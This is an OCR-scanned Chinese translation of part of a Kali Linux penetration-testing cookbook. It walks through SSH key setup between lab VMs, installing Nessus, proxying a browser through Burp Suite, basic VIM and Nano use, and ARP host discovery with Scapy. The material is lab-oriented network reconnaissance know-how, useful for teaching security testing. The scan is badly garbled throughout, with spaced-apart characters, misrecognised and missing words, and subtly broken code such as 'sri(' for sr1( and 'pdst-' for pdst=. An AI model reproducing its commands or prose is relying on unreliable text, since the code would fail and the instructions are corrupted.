接 下 来 ， 系 统 会 要 求 你 提供 HTTP 代理 地 址 。 本 书 中 所 述 的 任何 练习 都 不 需要 外 
部 HTTP 代理 ， 因 此 可 以 将 其 留 空 : 
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最 后 ， 选 择 Yes 来 安装 GRUB 引导 加 载 程序 ， 然 后 按 Enter 键 完成 安装 过 程 。 
当 系 统 加 载 时 ， 你 可 以 使 用 安装 期 间 提供 的 root 帐户 和 密码 登录 : 





工作 原理 


Kali Linux 是 一 个 Debian Linux 发 行 版 ， 其 中 包含 大 量 预 安装 的 第 三 方 渗透 工具 。 
虽然 所 有 这 些 工具 都 可 以 独立 获取 和 安装 ，Kali Linux 提供 的 组 织 和 实现 使 其 成 为 
任何 渗透 测试 者 的 有 力 工 具 。 


1.8 配置 和 使 用 SSH 


同时 处 理 多 个 虚拟 机 可 能 会 变 得 乏味 ， 耗 时 和 令 人 温 表 。 为 了 减少 从 一 个 VMware 
屏幕 跳 到 另 一 个 VMware 屏幕 的 需要 ， 并 增加 虚拟 系统 之 间 的 通信 便利 性 ， 在 每 个 
虚拟 系统 上 配置 和 启用 SSH 非 常 有 帮助 。 这 个 秘籍 讨论 了 如 何在 每 个 Linux 虚拟 机 
上 使 用 SSH © 


准备 
为 了 在 虚拟 机 上 使 用 SSH， 必 须 先 在 主机 系统 上 安装 SSH 客户 端 。 SSH EP 
集成 到 大 多 数 Linux 和 OS X 系统 中 ， 并 且 可 以 从 终端 接口 访问 。 如 果 你 使 用 


Windows 主 机 ， 则 需要 下 载 并 安装 Windows 终端 服务 客户 端 。 一 个 免费 和 容易 使 
用 的 是 PuUTTY。 PuTTY 可 以 从 http://www.putty.org/ FR ° 


操作 步骤 

你 首先 需要 在 图 形 界面 中 直接 从 终端 启用 SSH。 此 命令 需要 在 虚拟 机 客户 端 中 直 
接 运 行 。 除 了 Windows XP 虚拟 机 ， 环 境 中 的 所 有 其 他 虚拟 机 都 是 Linux 发 行 
版 ， 并 且 应 该 原生 支持 SSH。 局 用 此 功能 的 步骤 在 几乎 所 有 Linux 发 行 版 中 都 是 
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相同 的 ， 如 下 所 示 : 





/etc/init.d/ssh start 命令 可 用 于 局 动 服 务 。 如 果 你 没有 使 用 root BR? 
则 需要 将 sudo 预 置 到 此 命令 。 如 果 接 收 到 错误 ， 则 可 外 qae Eds SSH d 
护 程序 。 如 果 是 这 种 情况 ， 执行 apt-get install ssh 命令 可 用 于 安装 SSH qv 
护 程序 。 然 后 ， ifconfig 可 用 于 获取 系统 的 |P 地 址 ， 这 将 用 于 建立 SSH 连 接 。 
激活 后 ， 现 在 可 以 使 用 SSH 从 主机 系统 访问 VMware 客户 系统 。 为 此 ， 请 最 小 化 
虚拟 机 并 打开 主机 的 SSH 客户 端 。 


如 果 你 使 用 Mac OSX X Linux 作为 主机 系统 ， 则 可 以 直接 从 终端 调用 客户 端 。 或 
者 ， 如 果 你 在 Windows 主机 上 运行 虚拟 机 ， 则 需要 使 用 终端 模拟 器 ， 如 PuTTY。 
在 以 下 示例 中 ， 我 们 通过 提供 Kali 虚拟 机 的 IP 地 址 建立 SSH i$ : 


DEMOSYS:~ jhutchens$ ssh root@172.16.36.244 

The authenticity of host '172.16.36.244 (172.16.36.244)' can't b 
e established. 

RSA key fingerprint is c7:13:ed:c4:71:4f:89:53:5b:ee:cf:1f:40:06 
:d9:11. 

Are you sure you want to continue connecting (yes/no)? yes 
Warning: Permanently added '172.16.36.244' (RSA) to the list of 
known hosts. 

root@172.16.36.244's password: 

Linux kali 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali5d i686 


The programs included with the Kali GNU/Linux system are free so 
ftware; the exact distribution terms for each program are descri 
bed in the individual files in /usr/share/doc/*/copyright. 


Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. root@kali:~# 


下 载 示 例 代 码 


你 可 以 从 http://www.packtpub.com 下 载 你 从 帐户 中 购买 的 所 有 Packt 图 书 
的 示例 代码 文件 。 如 果 你 在 其 他 地 方 购买 此 书 ， 可 以 访 
问 http: //www.packtpub* com / support 并 注册 ， 以 使 文件 能 够 直接 发 


送 给 你 。 


SSH 客 户 端的 适当 用 法 是 ssh [user] Q0 [IP address] ° 在 提供 的 示例 中 ， 
SSH 将 使 用 root 帐户 访问 Kali 系统 (由 提供 的 IP 地 址 标识 ) 。 由 于 主机 未 包 
含 在 已 知 主机 列表 中 ， 因 此 将 首次 提示 你 确认 连接 。 为 此 ， 请 输入 yes 。 然后 会 
提示 你 输入 root 帐户 的 密码 。 输 入 后 ， 你 应 该 可 以 通过 远程 shell 访 问 系 统 。 相 
同 的 过 程 可 以 在 Windows 中 使 用 PuTTY 完 成 。 它 可 以 通过 本 秘籍 的 准备 就 绪 部 分 
提供 的 链接 下 载 。 下 载 后 ， 打 开 PUTTY 并 在 “主机 名 ?字段 中 输入 虚拟 机 的 |P 地 址 ， 
并 确保 SSH 单 选 按 钮 选中 ， 如 以 下 屏幕 截图 所 示 : 


Category 
Session Basic options for your PUTTY session 


Logging Specify the destination you wart to connect to 


Terminal 
lindos Host Name (or IP address) Pot 
»yboard 
Bell 172.16.36.232 22 
Features Connection type 
Window Raw Telnet Riogn @ SSH Senal 
pearance 
t Mey Load, save or delete a stored session 
Translation Saved Sessions 
Selection 
"^ Colours Default Settings 
Connection 
Data 
Proxy 
Telnet 
Rlogin 
SSH 


Close window on exit 


Always Never © Only on clean exit 








一 旦 设置 了 连接 配置 ， 单 击 Open 按钮 启动 会 话 。 系统 会 提示 我 们 输入 用 户 名 和 
密码 。 我 们 应 该 输入 我 们 连接 的 系统 的 凭据 。 一旦 认证 过 程 完 成 ， 我 们 会 被 远程 
终端 授予 系统 的 访问 权限 ， 如 以 下 屏幕 截图 所 示 : 





通过 将 公 角 提供 给 远程 主机 上 的 authorized keys 文件 ， 可 以 避免 每 次 都 进行 身 
份 验证 。 执行 此 操作 的 过 程 如 下 : 


root@kali:~# ls .ssh 

ls: cannot access .ssh: No such file or directory 
root@kali:~# mkdir .ssh 

root@kali:~# cd .ssh/ r 

oot@kali:~/.ssh# nano authorized keys 


首先 ， 确 保 ,ssh 隐藏 目录 已 存在 于 根 目 录 中 。 为 此 ， 请 以 目录 名 称 使 用 ls o 
如 果 它 不 存在 ， 请 使 用 mkdir 创建 目录 。 然后 ， 使 用 cd 命令 将 当前 位 置 更 改 为 
该 目录 。 然后 ， 使 用 Nano 或 VIM 创建 名 为 authorized keys 的 文件 。 如 果 你 不 
熟悉 如 何 使 用 这 些 文本 编辑 器 ， 请 参阅 本 章 中 的 “使 用 文本 编辑 器 (VIM 和 

Nano) "秘籍 。 在 此 文件 中 ， 你 应 该 粘贴 SSH 客 户 端 使 用 的 公 钥 ， 如 下 所 示 : 


DEMOSYS :~ jhutchens$ ssh root@172.16.36.244 
Linux kali 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali5 i686 


The programs included with the Kali GNU/Linux system are free so 
ftware; the exact distribution terms for each program are descri 
bed in the individual files in /usr/share/doc/*/copyright. 


Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. 

Last login: Sat May 10 22:38:31 2014 from 172.16.36.1 
root@kali:~# 


一 旦 操作 完毕 ， 你 应 该 能 够 连接 到 SSH， 而 不 必 提 供 验 证 的 密码 。 


工作 原理 
SSH 在 客户 端 和 服务 器 之 间 建 立 加 密 的 通信 通道 。 此 通道 可 用 于 提供 远程 管理 服 
务 ， 并 使 用 安全 复制 (SCP) 安全 地 传输 文件 。 


1.9 在 Kali 上 安装 Nessus 


Nessus 有 是 一 个 功能 强大 的 漏洞 扫描 器 ， 可 以 安装 在 KaliLinux 平 台 上 。 该 秘籍 讨论 
了 安装 ， 启 动 和 激活 Nessus 服 务 的 过 程 。 


准备 


在 尝试 在 Kali Linux 中 安装 Nessus 漏 洞 扫 描 程序 之 前 ， 你 需要 获取 一 个 激活 代码 。 
此 激活 代码 是 获取 审计 插件 所 必需 的 ，Nessus 用 它 来 评估 联网 系统 。 如 果 你 打算 在 
家 里 或 者 在 你 的 实验 室 中 使 用 Nessus， 你 可 以 免费 获得 家 庭 版 密 钥 。 或 者 ， 如 果 你 
要 使 用 Nessus 审 计生 产 系 统 ， 则 需要 获取 专业 版 密 钥 。 在 任 一 情况 下 ， 你 都 可 以 
在 http: // www. tenable.com/products/nessus/nessus-plugins/obtain-an 
获取 此 激活 码 。 


— U BLK RR 获得 了 你 尔 的 激 活 代码 ， 你 将 需要 

在 http://www.tenable.com/products/nessus/ select-your-operating-syst 

Hell da 包 。 以 下 屏幕 截图 显示 了 Nessus 可 以 运行 的 各 种 平台 及 其 相应 的 
包 的 列表 : 


Download Nessus 
Please Select Your Operating System 


» Microsoft Windows 


» MacOSX 


Nessus-5.2 6-debian6, 1386 deb 


Nessus-5.2.6-debian6  amd64 deb 


为 已 安装 的 操作 系统 的 体系 结构 选择 适当 的 安装 旦 你 选择 它 ， 阅 读 并 同意 
Tenable 提 供 的 订阅 协议 。 然后 你 的 系统 将 下 安装 。 单 击 保 存 文件 ， 然 后 浏览 
要 保存 到 的 位 置 


Opening Nessus-5.2.6-debian6.i386.deb 
You have chosen to open 


_ Nessus-5.2.6-debian6.i386.deb 


which is a: Debian package (28.4 MB) 
from: http-//downloads.nessus org 


Would you like to sae this file? 


Cancel | Save File 


在 提供 的 示例 e Pod 装 程序 包 保存 到 根 目 录 。 下载 后 ， 你 可 以 从 命令 行 完成 
安装 。 这 可 以 通过 SSH 或 通过 图 形 桌 面 上 的 终端 以 下 列 方 式 完成 : 


root@kali:~# ls 

Desktop Nessus-5.2.6-debian6_i386.deb 

root@kali:~# dpkg -i Nessus-5.2.6-debian6_i386.deb 
Selecting previously unselected package nessus. 
(Reading database ... 231224 files and directories currently ins 
talled.) 

Unpacking nessus 

(from Nessus-5.2.6-debian6_i386.deb) 

Setting up nessus (5.2.6) ... 

nessusd (Nessus) 5.2.6 [build N25116] for Linux 
Copyright (C) 1998 - 2014 Tenable Network Security, Inc 


Processing the Nessus plugins... [fJ AHHH 
THHHHHHHHHHHHHHHHHHHI] 


All plugins loaded 


- You can start nessusd by typing /etc/init.d/nessusd start 
- Then go to https://kali:8834/ to configure your scanner 


rootQkali:-4 /etc/init.d/nessusd start 
$Starting Nessus 


使 用 ls 命令 验证 安装 包 是 否 在 当前 目录 中 。 你 应 该 会 在 响应 中 看 到 它 。 然后 可 
以 使 用 Debian 软 件 包 管 理 器 ( dpkg ) 工具 安装 服务 。 -i 参数 告诉 软件 包 管 理 
器 安装 指定 的 软件 包 。 安装 完成 后 ， 可 以 使 用 命 
A /etc/init.d/nessusd start 启动 服务 。 N id 全 从 Web 脐 面 运 行 ， 可 以 
| c: c m T 
ME: https: //127.0.0.1:8834/ ° 或 者 ， 你 可 以 通过 Web 浏 览 器 使 用 Kali 
Linux 虚 拟 机 的 IP 地 址 从 远程 系统 (do EER) 访问 它 。 在 提供 的 示例 中 ， 
从 主机 操作 系统 访问 Nessus 服 务 的 响应 URL 是 https://172.16.36.244:8834 


This Connection is Untrusted 
You have asked Firefox to connect securely to 172.16.36.244:8834, but we can't confirm 


that your connection is secure. 


Normally, when you try to connect securely, sites will present trusted identification to prove 
that you are going to the right place. However, this site's identity can't be verified. 


What Should 1 Do? 


If you usually connect to this site without problems, this error could mean that someone is 
trying to impersonate the site, and you shouldn't continue. 


Get me out of here! 
» Technical Details 


» [| Understand the Risks 


Vua 情况 下 ，Nessus 服 务 使 用 自 ， 因 此 你 将 收 到 不 受信 任 的 连接 警 
告 。 对 于 安全 实验 室 使 用 目的 ， 你 可 以 忽略 此 警告 并 继续 。 这 可 以 通过 展 
开 I Understand the Risks 选项 来 完成 ， 如 以 下 屏幕 截图 所 示 : 


* | Understand the Risks 


If you understand what's going on, you can tell Firefox to start trusting this site's 
identification. Even if you trust the site, this error could mean that someone is 
tampering with your connection. 


Don't add an exception unless you know there's a good reason why this site doesn't use 
trusted identification. 


Add Exception... 


当 你 展开 了 此 选项 时 ， 你 可 以 单 击 Add Exception 按钮 。 这 会 防止 每 次 尝试 访问 
服务 时 都 必须 处 理 此 警告 。 将 服务 作为 例外 添加 后 ， 你 将 看 到 欢迎 屏幕 。 从 这 
里 ， 点 击 Get started 按钮 。 这 会 将 你 带 到 以 下 屏幕 : 


Initial Account Setup 


First, we need to create an admin user for the scanner. This user will 
have administrative control on the scanner; the admin has the ability to 
create/delete users, stop ongoing scans, and change the scanner 
configuration. 


Login: hutch 


Password: eeeeeecs 


Confirm Password: eeeeeecse 


« Prev Next > 


必须 设置 的 第 一 个 配置 是 管理 员 的 用 户 帐 户 和 关联 的 密码 。 这 些 凭据 会 用 于 登录 和 
使 用 Nessus 服 务 。 输入 新 的 用 户 名 和 密码 后 ， 单 击 Next 继续 ; 您 会 看 到 以 下 屏 
E: 


Plugin Feed Registration 


As information about new vulnerabilities is discovered and released 
into the public domain, Tenable's research staff designs programs 
("plugins") that enable Nessus to detect their presence. The plugins 
contain vulnerability information, the algorithm to test for the presence 
of the security issue, and a set of remediation actions. Enter your 
Activation Code below to subscribe to a "Plugin Feed". 


Please enter your 
Activation Code: 


^ 


MM 


后 ， 你 需要 输入 激活 代码 。 如 果 你 没有 激活 码 ， 请 参阅 本 秘籍 的 准备 就 绪 部 分 。 
后 ， 输 入 激活 码 后 ， 你 会 返回 到 登录 页 面 ， 并 要 求 输入 你 的 用 户 名 和 密码 。 在 此 

， 你 需要 输入 在 安装 过 程 中 创建 的 相同 凭据。 以 下 是 之 后 每 次 访问 URL 时 ， 
essus 会 加 载 的 默认 屏幕 : 


z 


Z mg 
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($3 Nessus 


home 


hutch 


工作 原理 


正确 安装 后 ， 可 以 从 主机 系统 和 安装 了 图 形 Web 济 览 器 的 所 有 虚拟 机 访问 Nessus 漏 
洞 扫描 程序 。 这 是 因为 Nessus/ 4-ic$ 管 在 TCP 端 口 8834 上 ， 并 且 主 机 和 所 有 其 他 
虚拟 系统 拥有 位 于 相同 私有 IP 空 间 中 的 网 络 接口 。 


1.10 在 Kali 上 配置 Burp Suite 


Burp Suite Proxy 是 实用 而 强大 的 Web 应 用 程序 审计 工具 之 一 。 但 是 ， 它 不 是 一 个 
可 以 轻松 地 单 击 来 启动 的 工具 。 我 们 必须 n oe 应 用 程序 和 相关 Web 3] 
览 器 中 的 配置 ， 以 确保 每 个 配置 与 其 他 设备 正确 通信 


准备 

在 Kali Linux 中 首次 启动 Burp Suite 不 需要 做 任何 事情 。 免费 版 是 一 个 集成 工具 ， 
它 已 经 安装 了 。 或 者 ， 如 果 你 选择 使 用 专业 版 本 ， 可 以 

在 https://pro.portswigger.net/buy/ 购买 许可 证 。 许可 证 相对 便宜 ， 对 于 
额外 的 功能 非常 值得 。 然而 ， 免 费 版 仍然 非常 有 用 ， 并 且 为 用 户 免 费 提 供 大 多 数 核 


操作 步骤 


Burp Suite 是 一 个 GUI 工具 ， 需 要 访问 图 形 旧 面 才能 运行 。 因 此 ，Burp Suite 不 
能 通过 SSH 使 用 。 在 Kali Linux 中 有 两 种 方法 启动 Burp Suite。 你 可 以 

在 Applications 菜单 中 浏 

览 Que | Kali Linux | Top 10 Security Tools | burpsuite ° 
或 者 ， 你 可 以 通过 将 其 传 给 bash 终端 中 的 Java 解释 器 来 执行 它 ， 如 下 所 示 : 


root@kali:~# java -jar /usr/bin/burpsuite.jar 


加 载 Burp Suite Æ > 33 青 确保 代理 监 监听 器 处 于 活动 状态 ， 并 在 所 需 的 端口 上 运行 。 
提供 的 示例 使 用 TCP 端口 8080。 我们 可 以 通过 选择 Proxy 选项 卡 ， 然 后 选择 下 
面 的 Options 选项 卡 来 验证 这 些 配 置 ， 如 以 下 屏幕 截图 所 示 : 











(g) Proxy Listeners 


Y Burp Proxy uses listeners to receive incoming HTTP requests from your browser. Y« 
its proxy server. 





| Add Running | Interface | Invisible | Redirect 
(J 1270018080 O 

| Edit 

| Remove | 


在 这 里 ， 你 会 看 到 所 有 代理 监听 器 的 列表 。 如 果 没 有 ， 请 添加 一 个 。 要 与 Kali 
Linux 中 的 IceWeasel Web 浏览 器 一 起 使 用 ， 请 将 监听 器 配置 为 侦 

听 127.0.0.1 oL LH Ra 。 此 外 ， 请 确保 激活 Running #272 » 在 Burp 
Suite 中 配置 监听 器 ， 还 需要 修改 IceWeasel 浏览 器 配置 来 通过 代理 转发 流 

量 。 为 此 ， 请 REOR RR weasel globe 图 标 打 开 IceWeasel ° 打开 
后 ， 展 开 Edit 下 拉 菜 单 ， 然 后 单 击 Preferences 以 获取 以 下 屏幕 截图 : 











ee 
Iceweasel Preferences Veal = a Me, Sal 


H= 8$ K PaO 


General Tabs Content Applications Privacy Security Sync Advanced 


fu 
General Network Update Encryption 


Connection 

Configure how Iceweasel connects to the Internet | Settings. 
Cached Web Content 

Your web content cache is currently using 63.0 KB of disk space Clear Now 


Override automatic cache management 


在 IceWeasel 首选 项 菜单 中 ， 单 击 顶 部 的 高 级 Advanced 选项 按钮 ， 然 后 选 
择 Network 选项 卡 。 然 后 ， 单 击 Connection 标题 下 的 Settings 按钮 。 这 将 
打开 Connection Settings 配置 菜单 ， 如 以 下 屏幕 截图 所 示 : 


Connection Settings 
Configure Proxies to Access the Internet 
| No proxy 
© Auto-detect proxy settings for this network 
Use system proxy settings 
'* Manual proxy configuration: 
HTTP Proxy: [127001 — | Port: | 8080|. 


v Use this proxy server for ail protocols 


默认 情况 下 ， 代 理 单 选 按钮 设置 为 Use system proxy settings (使 用 系统 代 
理 设置 ) 。 这 需要 更 改 为 Manual proxy configuration (手动 代理 配置 ) 。 
手动 代理 配置 应 与 Burp Suite 代理 监听 器 配置 相同 。 在 所 提供 的 示例 中 ，HTTP 代 
理 地 址 设置 为 127.0.0.1 ， 端 口 值 设 置 为 TCP 8080. 要 捕获 其 他 流量 (如 
HTTPS) ， 请 单 击 Use this proxy server for all protocols (为 所 有 协议 
使 用 此 代理 服务 器 ) 复 选 框 。 要 验证 一 切 是 否 正常 工作 ， 请 尝试 使 用 IceWeasel 
浏览 器 浏览 网 站 ， 如 以 下 屏幕 截图 所 示 : 


File Edit View History Bookmarks Tools Help 
|G Connecting... EJ 


| vww.packtpub.com 





f3Most Visited v PJOffensive Security ' Kali Linux 


如 果 你 的 配置 正确 ， 您 应 该 看 到 浏览 器 尝试 连接 ， 但 没有 任何 内 容 将 在 浏览 器 中 呈 
现 。 这 是 因为 从 浏览 器 发 送 的 请 求 被 代理 拦截 。 代理 拦截 是 Burp Suite 中 使 用 的 
默认 配置 。 要 确认 请 求 已 成 功 捕获 ， 请 返回 Burp Suite 代理 接口 ， 如 图 所 示 : 





Target T m rm m me enm e e n 


Request to http. /lw packtpub com. B0 [83 166 169 231] 
Headers Hex 


GET / HTTP/1.1 

Host: www.packtpub.com 

User-Agent: Mozilla/S.0 (X11; Linux 1686; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1 
Accept: text/html,application/xhtml-4-xml,application/xml:qz 0.9,*/*;3: 0.8 

Accept-Language: en-US,en;q- 0.5 

Accept-Encoding: gzip, deflate 

Connection: keep-alive 





在 这 里 ， 你 应 该 看 到 捕获 的 请 求 。 要 继续 将 浏览 器 用 于 其 他 用 途 ， 你 可 以 将 代理 配 
置 更 改 为 被 动 监听 ， 只 需 点 击 Intercept is on (拦截 开启 ) 按钮 就 可 以 将 其 禁 
用 ， 或 者 你 可 以 将 浏览 器 中 的 代理 设置 更 改 

€] Use system proxy settings (使 用 系统 代理 设置 选项 ) ， 使 用 Burp 时 使 用 
手动 代理 设置 9 
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工作 原理 


在 Burp Suite 中 使 用 的 初始 配 置 在 TCP 8080 上 创建 了 一 个 监 监听 端 口 。 该 端口 由 
Burp Suite 用 于 拦截 所 有 Web 流量 ， 并 接收 由 响应 返回 的 入 站 流量 。 通过 将 
IceWeasel Web 浏览 器 的 代理 配置 指向 此 端口 ， 我 们 让 浏 浏览 器 中 生成 的 所 有 流量 都 
通过 Burp Suite 代理 进行 路 由 。 由 于 Burp 提供 的 功能 ， 我 们 现在 可 以 随意 修改 途 
中 的 流量 。 


1.11 使 用 文本 编辑 器 (VIM 和 Nano) 
文本 编辑 器 
文本 编辑 器 
置 文件 或 现 


会 经 常用 于 创建 或 修改 文件 系统 中 的 现 有 文件 。 你 应 该 在 任何 时 候 使 用 
在 Kali 中 创建 自 定 义 脚 本 。 你 还 应 在 任何 时 候 使 用 文本 编辑 器 修改 配 
有 渗透 测试 工具 。 


准备 


在 Kali Linux 中 使 用 文本 编辑 器 工具 之 前 ， 不 需要 执行 其 他 步骤 。VIM 和 Nano 都 是 
集成 工具 ， 已 经 安装 在 操作 系统 中 。 


操作 步骤 


为 了 使 用 Kali 中 的 VIM 文本 编辑 器 创建 文件 ， 请 使 用 vim 命令 ， 并 带 有 要 创建 或 
修改 的 文件 名 称 : 


root@kali:~# vim vim demo.txt 


在 提供 的 示例 中 ，VIM 用 于 创建 名 为 vim demo.txt 的 文件 。 由 于 当前 没有 文件 
以 该 名 称 存 在 于 活动 目录 中 ，VIM 自动 创建 一 个 新 文件 并 打开 一 个 空 文本 编辑 器 。 
为 了 开始 在 编辑 器 中 输入 文本 ， 请 按 I 或 Insert 按钮 。 然 后 ， 开 始 输入 所 需 的 
LA» ETAS: 


Write to file demonstration with VIM 


在 提供 的 示例 中 ， 只 有 一 行 添加 到 文本 文件 。 但是， 在 大 多 数 情 况 下 ， 在 创建 新 文 
件 时 ， 很 可 能 使 用 多 行 。 完 成 后 ， 按 Esc 键 退出 插入 模式 并 在 VIM TAAT 令 模 
式 。 然 后 ， 键 入 :wd 并 按 Enter 键 保存 。 然后 ， 你 可 以 使 用 以 下 bash 命令 验 
证 文件 是 否 存 在 并 验证 文件 的 内 容 : 


root@kali:~# ls 

Desktop vim demo.txt 

root@kali:~# cat vim demo.txt 

Write to file demonstration with VIM 


ls 命令 可 以 用 来 查看 当前 目录 的 内 容 。 在 这 里 ， 你 可 以 看 到 vim_demo.txt x 
件 已 创建 。 cat 命令 可 用 于 读 取 和 显示 文件 的 内 容 。 也 可 以 使 用 的 替代 文本 编辑 
器 是 Nano。 Nano 的 基本 用 法 与 VIM 非常 相似 。 为 了 开始 ， 请 使 用 nano 命 
令 ， 后 面 带 有 要 创建 或 修改 的 文件 名 称 : 


root@kali:~# nano nano demo.txt 


在 提供 的 示例 中 ， nano 用 于 打开 名 为 nano demo.txt 的 文件 。 由 于 当前 不 存 
在 具有 该 名 称 的 文件 ， 因 此 将 创建 一 个 新 文件 。 与 VIM 不 同 ， 没 有 单独 的 命令 和 
写 入 模式 。 相反 ， 写 入 文件 可 以 自动 完成 ， 并 且 通 过 按 Ctrl 键 和 特定 的 字母 键 
来 执行 命令 。 这 些 命令 的 列表 可 以 始终 在 文本 编辑 器 界面 的 底部 看 到 : 


GNU nano 2.2.6 File: nano demo.txt 
Write to file demonstration with Nano 


提供 的 示例 向 nano demo.txt 文件 写 入 了 一 行 。 要 关闭 编辑 器 ， 可 以 使 

用 ctrl +X ， 然 后 会 提示 您 使 用 y 保存 文件 或 使 用 n 不 保存 文件 。 系统 会 要 
求 你 确认 要 写 入 的 文件 名 。 默认 情况 下 ， 会 使 用 Nano 执行 时 提供 的 名 称 填充 。 
但 是 ， 可 以 更 改 此 值 ， 并 将 文件 的 内 容 另 存 为 不 同 的 文件 名 ， 如 下 所 示 : 


root@kali:~# ls 

Desktop nano demo.txt vim demo.txt 
root@kali:~# cat nano demo.txt 

Write to file demonstration with Nano 


一 旦 完成 ， 可 以 再 次 使 用 1s 和 cat 命令 来 验证 文件 是 否 写 入 目录 ， 并 分 别 验证 
文件 的 内 容 。 这 个 秘籍 的 目的 是 讨论 每 个 这 些 编辑 器 的 基本 使 用 来 编写 和 操纵 文 
件 。 然而 要 注意 ， 这 些 都 是 非常 强大 的 文本 编辑 器 ， 有 大 量 其 他 用 于 文件 编辑 的 功 
能 。 有 关 其 用 法 的 更 多 信息 ， 请 使 用 man 命令 访问 手册 页 ， 后 面 带 有 特定 文本 编 
辑 器 的 名 称 。 


工作 原理 


文本 编辑 器 只 不 过 是 命令 行 驱 动 的 字符 处 理工 具 。 这 些 工具 中 的 每 个 及 其 所 有 相关 
功能 可 以 在 不 使 用 任何 图 形 界面 而 执行 。 由 于 没有 任何 图 形 组件 ， 这 些 工 具 需 要 非 
常 少 的 开销 ， 并 且 极 快 。 因 此 ， 他 们 能 够 非常 有 效 并 快速 修改 文件 ， 或 通过 远程 终 


端 接 口 (如 SSH X Telnet) 处 理 文件 。 


第 二 章 探索 扫描 


作者 : Justin Hutchens 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


2.1 使 用 Scapy 探索 第 二 层 


Scapy 是 一 个 强大 的 交互 工具 ， 可 用 于 捕获 ， 分 析 ， 操 作 甚 至 创建 协议 兼容 的 网 络 
流量 ， 然 后 注入 到 网 络 中 。 Scapy 也 是 一 个 可 以 在 Python 中 使 用 的 库 ， 从 而 提供 
创建 高 效 的 脚本 ， 来 执行 网 络 流量 处 理 和 操作 的 函数 。 这 个 特定 的 秘籍 演示 了 如 何 
使 用 Scapy 执行 ARP 发 现 ， 以 及 如 何 使 用 P ython 和 Scapy 创建 脚本 来 简化 第 二 
层 发 现 过 程 。 


准备 


要 使 用 Scapy 执行 ARP 发 现 ， 你 需要 在 LAN 上 至 少 拥有 一 个 响应 ARP 请 求 的 系 
统 。 提供 的 示例 使 用 Linux 和 Windows 系统 的 组 合 。 有关 在 本 地 实验 环境 中 设置 
系统 的 更 多 信息 ， 请 参阅 第 一 章 入 中 的 “安装 Metasploitable2? 和 “安装 Windows 
Server" 秘 籍 。 


此 外 ， 本 节 需 要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 关 纺 
写 脚本 的 更 多 信息 ， 请 参阅 第 一 章 入 门 中 的 “使 用 文本 编辑 器 (VIM 和 Nano) " 秘 


籍 。 
操作 步骤 


为 了 了 解 ARP 发 现 的 工作 原理 ， 我 们 使 用 Scapy 来 开发 自 定义 数据 包 ， 这 允 让 我 
们 能 够 使 用 ARP 识别 LAN 上 的 主机 。 要 在 Kali Linux 中 开始 使 用 Scapy， 请 从 终 
端 输入 scapy 命令 。 然 后， 你 可 以 使 用 display() 函数 以 下 列 方式 查看 在 
Scapy 中 创建 的 任何 ARP 对 象 的 默认 配置 : 


root@KaliLinux:~# scapy Welcome to Scapy (2.2.0) 
>>> ARP().display() 
###[ ARP ]### 
hwtype- 0x1 
ptype= Ox800 
hwlen= 6 
plen= 4 
op= who-has 
hwsrc- 00:0c:29:fd:01:05 
psrc- 172.16.36.232 
hwdst- 00:00:00:00:00:00 
pdst- 0.0.0.0 


请 注意 ，IP 和 MAC 源 地 址 都 会 自动 配置 为 与 运行 Scapy 的 主机 相关 的 值 。 除非 
你 需要 伪造 源 地 址 ， 否 则 对 于 任何 Scapy 对 象 永远 不 必 更 改 这 些 值 。ARP 的 默认 
操作 码 值 被 自动 设置 为 who-has ， 表 明 该 封包 用 于 请 求 IP 和 MAC 关联 。 在 这 种 
情况 下 ， 我 们 需要 提供 的 唯一 值 是 目标 IP 地 址 。 为 此 ， 我 们 可 以 使 用 ARP 部 数 创 
建 一 个 对 象 ， 将 其 赋 给 一 个 变量 。 变量 的 名 称 是 无 所 谓 (在 提供 的 示例 中 ， 使 用 变 
量 名 称 arp_request ) » 看 看 下 面 的 命令 : 


>>> arp request = ARP() 
>>> arp request.pdst = "172.16.36.135" 
>>> arp request.display() 
###[ ARP ]### 

hwtype- 0x1 

ptype= Ox800 

hwlen= 6 

plen= 4 

op= who-has 

hwsrc- 00:0c:29:65:fc:d2 

psrc- 172.16.36.132 

hwdst- 00:00:00:00:00:00 

pdst- 172.16.36.135 


注意 ， display() 函数 可 以 在 新 创建 的 ARP 对 象 上 调用 ， 来 验证 配置 值 是 否 已 
更 新 。 对 于 此 练习 ， 请 使 用 与 实验 环境 网 络 中 的 活动 计算 机 对 应 的 目标 P 地 址 。 
然后 sr1() 函数 可 以 用 于 发 送 请 求 并 返回 第 一 个 响应 : 


>>> sri(arp request) 
Begin emission: 


Finished to send 1 packets. 


Received 39 packets, got 1 answers, remaining 0 packets 

«ARP hwtype=0x1 ptype=0x800 hwlen=6 plen=4 op=is-at hwsrc-00:0c 
:29:34d:84:32 psrc=172.16.36.135 hwdst=00:0c:29:65:fc:d2 pdst=172 
.16.36.132 |«Padding load='\x00\x00\x00\x00\x00\x00\x00\x00\x00 
\ X00NX00NX00NX00NXOONXOONXOONXOONXOO' |>> 


或 者 ， 模 可 以 通过 直接 调用 该 函数 ， 并 将 任何 特殊 配置 作为 参数 传递 给 它 ， 来 执行 
相同 的 任务 ， 如 以 下 命令 所 示 。 这 可 以 避免 使 用 不 必要 的 变量 的 混乱 ， 并 且 还 可 以 
在 单行 代码 中 完成 整个 任务 : 


>>> sri(ARP(pdst-"172.16.36.135")) 
Bot dh c ends Sql e. ed MEO F j 
Finished to send 1 packets. 


Received 26 packets, got 1 answers, remaining O packets 

«ARP hwtype=0x1 ptype-0x800 hwlen=6 plen=4 op=is-at hwsrc-00:0c 
:29:34d:84:32 psrc=172.16.36.135 hwdst=00:0c:29:65:fc:d2 pdst=172 
.16.36.132 |«Padding load='\x00\x00\x00\x00\x00\x00\x00\x00\x00 
\ X00NX00NX00NXO0NXOONXOONXOONXOONxOO' |>> 


注意 ， 在 这 些 情况 的 每 一 个 中 ， 返 回响 应 表明 ， 172.16.36.135 的 IP 地址 的 
MAC 地 址 为 690 : 9C : 29 : 3D : 84 : 32 。 如 果 执 行 相同 的 任务 ， 但 是 目标 IP 地 址 
